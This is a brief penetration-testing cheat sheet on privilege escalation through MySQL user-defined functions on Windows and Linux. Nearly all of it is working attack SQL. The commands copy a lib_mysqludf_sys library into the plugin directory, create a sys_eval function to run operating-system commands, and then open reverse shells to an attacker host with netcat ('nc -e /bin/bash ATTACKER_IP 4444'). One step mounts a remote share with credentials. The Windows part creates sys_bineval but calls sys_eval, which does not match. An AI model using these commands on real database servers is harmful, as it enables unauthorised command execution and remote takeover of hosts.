UDF

Discover Plugin Directory

SHOW VARIABLES LIKE 'plugin_dir';
SHOW PLUGINS;

Windows UDF Exploitation

SELECT load_file('\\\\192.168.x.x\\share\\lib_mysqludf_sys_64.dll') INTO DUMPFILE 'C:\xampp\mysql\lib\plugin\udf.dll';
CREATE FUNCTION sys_bineval RETURNS INT SONAME 'udf.dll';
SELECT sys_eval('whoami');
SELECT sys_eval('net use X: \\192.168.x.x\kali /user:kali kali');
SELECT sys_eval('X:\\nc.exe -e cmd.exe 192.168.x.x 80');

Linux UDF Exploitation

SELECT load_file('/tmp/lib_mysqludf_sys.so') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
SELECT sys_eval('id');
SELECT sys_eval('nc -e /bin/bash ATTACKER_IP 4444');